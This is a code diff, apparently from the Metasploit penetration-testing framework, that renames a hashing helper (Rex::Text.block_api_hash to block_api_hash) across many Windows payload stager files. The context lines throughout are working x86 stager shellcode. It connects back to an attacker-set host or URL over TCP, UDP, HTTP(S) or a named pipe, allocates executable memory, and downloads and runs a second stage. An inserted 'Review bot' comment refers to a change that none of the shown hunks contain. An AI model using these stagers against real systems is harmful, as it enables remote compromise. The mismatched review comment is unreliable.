VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE) push eax ; Save the new image base to stack xor edx,edx ; Zero out the edx @@ -129,7 +128,7 @@ def asm_reflective_pe_loader(opts) push ecx ; Save ecx to stack push edx ; Save edx to stack push eax ; Push the address of linrary name string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" ) + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA([esp+4]) pop edx ; Retrieve edx pop ecx ; Retrieve ecx 
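Review bot: In reflective_pe_loader.rb, dropping `prologue = ''` leaves `prologue` as `nil` on the non-DLL path unless an `else` branch outside this hunk assigns it; `#{prologue}` interpolation would silently emit an empty string, but `prologue << ...` or `prologue + ...` would raise. Keep the initialiser, or make the value unconditional with `prologue = opts[:is_dll] == true ? %(...) : ''` so it is always a String. If `:is_dll` is a real boolean, `if opts[:is_dll]` is the idiomatic form of the test. asm_reflective_pe_loader continues past the hunk.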
@@ -139,7 +138,7 @@ def asm_reflective_pe_loader(opts) push edx ; Save edx to stack push eax ; Push the address of proc name string push ebx ; Push the dll handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" ) + push #{block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" ) call ebp ; GetProcAddress(ebx,[esp+4]) pop edx ; Retrieve edx pop ecx ; Retrieve ecx diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index a1155383b5660..dff1433393212 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -246,7 +246,7 @@ def asm_reverse_http(opts={}) push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments ^ @@ -285,7 +285,7 @@ def asm_reverse_http(opts={}) ^ end asm << %Q^ - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} + push #{block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ @@ -302,7 +302,7 @@ def asm_reverse_http(opts={}) db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} + push #{block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi ^ @@ -321,7 +321,7 @@ def asm_reverse_http(opts={}) ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end 
@@ -337,7 +337,7 @@ def asm_reverse_http(opts={}) ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -352,7 +352,7 @@ def asm_reverse_http(opts={}) push edi ; server URI push ebx ; method push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} + push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -379,7 +379,7 @@ def asm_reverse_http(opts={}) push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -406,14 +406,14 @@ def asm_reverse_http(opts={}) asm << %Q^ push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} + push #{block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ @@ -442,7 +442,7 @@ def asm_reverse_http(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -459,7 +459,7 @@ def asm_reverse_http(opts={}) push 4 ; bytes to read push eax ; &stage size push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead) pop ebx ; bytesRead (unused, pop for cleaning) pop ebx ; stage size 
@@ -470,7 +470,7 @@ def asm_reverse_http(opts={}) push 0x1000 ; MEM_COMMIT push ebx ; Stage allocation push eax ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: xchg eax, ebx ; place the allocated base address in ebx @@ -482,7 +482,7 @@ def asm_reverse_http(opts={}) push eax ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) jz failure @@ -495,7 +495,7 @@ def asm_reverse_http(opts={}) push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -509,7 +509,7 @@ def asm_reverse_http(opts={}) push 8192 ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb index 9648e71db430f..a2f5244749734 100644 --- a/lib/msf/core/payload/windows/reverse_named_pipe.rb +++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb 
@@ -126,7 +126,7 @@ def asm_reverse_named_pipe(opts={}) db "#{full_pipe_name}", 0x00 get_pipe_name: ; lpFileName (via call) - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + push #{block_api_hash('kernel32.dll', 'CreateFileA')} call ebp ; CreateFileA(...) ; If eax is -1, then we had a failure. @@ -147,7 +147,7 @@ def asm_reverse_named_pipe(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -172,7 +172,7 @@ def asm_reverse_named_pipe(opts={}) push 4 ; nNumberOfBytesToRead = sizeof( DWORD ); push esi ; lpBuffer push edi ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(...) to read the size ^ @@ -195,7 +195,7 @@ def asm_reverse_named_pipe(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage @@ -217,7 +217,7 @@ def asm_reverse_named_pipe(opts={}) push ecx ; nNumberOfBytesToRead push ebx ; lpBuffer push edi ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(...) to read the data ^ @@ -237,7 +237,7 @@ def asm_reverse_named_pipe(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) ; restore the stack (one more pop after 2nd ReadFile call) pop esi 
@@ -245,7 +245,7 @@ def asm_reverse_named_pipe(opts={}) cleanup_file: ; clear up the named pipe handle push edi ; named pipe handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + push #{block_api_hash('kernel32.dll', 'CloseHandle')} call ebp ; CloseHandle(...) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb index 19ad38cfe7653..643dd0a2103eb 100644 --- a/lib/msf/core/payload/windows/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/reverse_tcp.rb @@ -118,7 +118,7 @@ def asm_reverse_tcp(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} mov eax, ebp call eax ; LoadLibraryA( "ws2_32" ) @@ -126,7 +126,7 @@ def asm_reverse_tcp(opts={}) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -145,7 +145,7 @@ def asm_reverse_tcp(opts={}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this ^ 
@@ -168,7 +168,7 @@ def asm_reverse_tcp(opts={}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); push #{encoded_host} ; host in little-endian format push #{encoded_port} ; family AF_INET and port number @@ -181,7 +181,7 @@ def asm_reverse_tcp(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -201,7 +201,7 @@ def asm_reverse_tcp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -231,7 +231,7 @@ def asm_block_recv(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ @@ -251,7 +251,7 @@ def asm_block_recv(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage 
@@ -262,7 +262,7 @@ def asm_block_recv(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -278,13 +278,13 @@ def asm_block_recv(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_tcp_dns.rb b/lib/msf/core/payload/windows/reverse_tcp_dns.rb index 4b998b3efd271..760cd9def42d8 100644 --- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb +++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb @@ -79,14 +79,14 @@ def asm_reverse_tcp_dns(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push eax ; if we succeed, eax will be zero, push zero for the flags param. 
@@ -97,7 +97,7 @@ def asm_reverse_tcp_dns(opts={}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -108,7 +108,7 @@ def asm_reverse_tcp_dns(opts={}) db "#{opts[:host]}", 0x00 got_hostname: - push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )} + push #{block_api_hash( "ws2_32.dll", "gethostbyname" )} call ebp ; gethostbyname( "name" ); set_address: @@ -122,7 +122,7 @@ def asm_reverse_tcp_dns(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -142,7 +142,7 @@ def asm_reverse_tcp_dns(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb index 1af3eb130f15e..352943a25ce08 100644 --- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb @@ -70,7 +70,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ 
@@ -93,7 +93,7 @@ def asm_block_recv_rc4(opts={}) ; push esi ; push the newly received second stage length. push ecx ; push the alloc length push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box @@ -106,7 +106,7 @@ def asm_block_recv_rc4(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -122,13 +122,13 @@ def asm_block_recv_rc4(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_udp.rb b/lib/msf/core/payload/windows/reverse_udp.rb index 05df86677e026..64cdb831d4c1a 100644 --- a/lib/msf/core/payload/windows/reverse_udp.rb +++ b/lib/msf/core/payload/windows/reverse_udp.rb 
@@ -75,14 +75,14 @@ def asm_reverse_udp(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -101,7 +101,7 @@ def asm_reverse_udp(opts={}) inc eax ; push eax ; push SOCK_DGRAM (UDP socket) push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -109,7 +109,7 @@ def asm_reverse_udp(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -129,7 +129,7 @@ def asm_reverse_udp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -160,7 +160,7 @@ def asm_send_newline db #{newline} ; newline get_nl_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send ^ asm 
diff --git a/lib/msf/core/payload/windows/reverse_win_http.rb b/lib/msf/core/payload/windows/reverse_win_http.rb index c380376add27d..b6e2ed58a84ca 100644 --- a/lib/msf/core/payload/windows/reverse_win_http.rb +++ b/lib/msf/core/payload/windows/reverse_win_http.rb @@ -205,7 +205,7 @@ def asm_reverse_winhttp(opts={}) push 0x00707474 ; Push the string 'winhttp',0 push 0x686E6977 ; ... push esp ; Push a pointer to the "winhttp" string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "winhttp" ) ^ @@ -215,7 +215,7 @@ def asm_reverse_winhttp(opts={}) push 0x00323374 ; Push the string 'crypt32',0 push 0x70797263 ; ... push esp ; Push a pointer to the "crypt32" string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wincrypt" ) ^ end @@ -236,7 +236,7 @@ def asm_reverse_winhttp(opts={}) ; ProxyName (via call) push 3 ; AccessType (NAMED_PROXY= 3) push ebx ; UserAgent (NULL) [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpen')} call ebp ^ else @@ -246,7 +246,7 @@ def asm_reverse_winhttp(opts={}) push ebx ; ProxyName (NULL) push ebx ; AccessType (DEFAULT_PROXY= 0) push ebx ; UserAgent (NULL) [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpen')} call ebp ^ end @@ -280,7 +280,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ push eax ; Session handle returned by WinHttpOpen - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} + push #{block_api_hash('winhttp.dll', 'WinHttpConnect')} call ebp WinHttpOpenRequest: 
@@ -292,7 +292,7 @@ def asm_reverse_winhttp(opts={}) push edi ; ObjectName (URI) push ebx ; Verb (GET method) (NULL) push eax ; Connect handle returned by WinHttpConnect - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} call ebp xchg esi, eax ; save HttpRequest handler in esi ^ @@ -325,7 +325,7 @@ def asm_reverse_winhttp(opts={}) push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1) push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1) push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetCredentials')} call ebp ^ elsif opts[:proxy_ie] == true @@ -337,7 +337,7 @@ def asm_reverse_winhttp(opts={}) push edi ; store the current URL in case it's needed mov edi, eax ; put the buffer pointer in edi push edi ; Push a pointer to the buffer - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} + push #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} call ebp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -374,7 +374,7 @@ def asm_reverse_winhttp(opts={}) push edx ; lpcwszUrl lea eax, [esp+64] ; Find the pointer to the hSession - HACK! push [eax] ; hSession - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} + push #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} call ebp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -403,7 +403,7 @@ def asm_reverse_winhttp(opts={}) push edi ; lpBuffer (pointer to the proxy) push 38 ; dwOption (WINHTTP_OPTION_PROXY) push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} call ebp ie_proxy_setup_finish: 
@@ -420,7 +420,7 @@ def asm_reverse_winhttp(opts={}) push eax ; &buffer push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} call ebp ^ end @@ -456,7 +456,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} + push #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp test eax,eax jnz check_response ; if TRUE call WinHttpReceiveResponse API @@ -476,7 +476,7 @@ def asm_reverse_winhttp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -500,7 +500,7 @@ def asm_reverse_winhttp(opts={}) push ebx ; &buffer push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')} call ebp test eax, eax ; jz failure ; Bail out if we couldn't get the certificate context @@ -517,7 +517,7 @@ def asm_reverse_winhttp(opts={}) push edi ; &buffer (20-byte SHA1 hash) push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) push [ebx] ; *pCert - push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} + push #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} call ebp test eax, eax ; jz failure ; Bail out if we couldn't get the certificate context 
@@ -555,7 +555,7 @@ def asm_reverse_winhttp(opts={}) ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) push esi ; Request handler returned by WinHttpSendRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} + push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} call ebp test eax,eax jz failure @@ -570,7 +570,7 @@ def asm_reverse_winhttp(opts={}) push 4 ; bytes to read push eax ; &stage size push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead) pop ebx ; bytesRead (unused, pop for cleaning) pop ebx ; stage size @@ -583,7 +583,7 @@ def asm_reverse_winhttp(opts={}) push 0x1000 ; MEM_COMMIT push ebx ; Stage allocation push eax ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -597,7 +597,7 @@ def asm_reverse_winhttp(opts={}) push eax ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp test eax,eax ; download failed? (optional?) jz failure @@ -610,7 +610,7 @@ def asm_reverse_winhttp(opts={}) ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) push esi ; Request handler returned by WinHttpSendRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} + push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} call ebp test eax,eax jz failure 
@@ -620,7 +620,7 @@ def asm_reverse_winhttp(opts={}) push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -634,7 +634,7 @@ def asm_reverse_winhttp(opts={}) push 8192 ; NumberOfBytesToRead push ebx ; Buffer push esi ; Request handler returned by WinHttpReceiveResponse - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp test eax,eax ; if download failed? (optional?) diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb index 60ae0a629c37c..fc44a33581096 100644 --- a/lib/msf/core/payload/windows/send_uuid.rb +++ b/lib/msf/core/payload/windows/send_uuid.rb @@ -28,7 +28,7 @@ def asm_send_uuid(uuid=nil) db #{raw_to_db(uuid_raw)} ; UUID get_uuid_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send ^ diff --git a/lib/msf/core/payload/windows/x64/addr_loader.rb b/lib/msf/core/payload/windows/x64/addr_loader.rb index d5e789cbaf871..4e5fb263ccef4 100644 --- a/lib/msf/core/payload/windows/x64/addr_loader.rb +++ b/lib/msf/core/payload/windows/x64/addr_loader.rb @@ -47,7 +47,7 @@ def asm_block_loader pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received 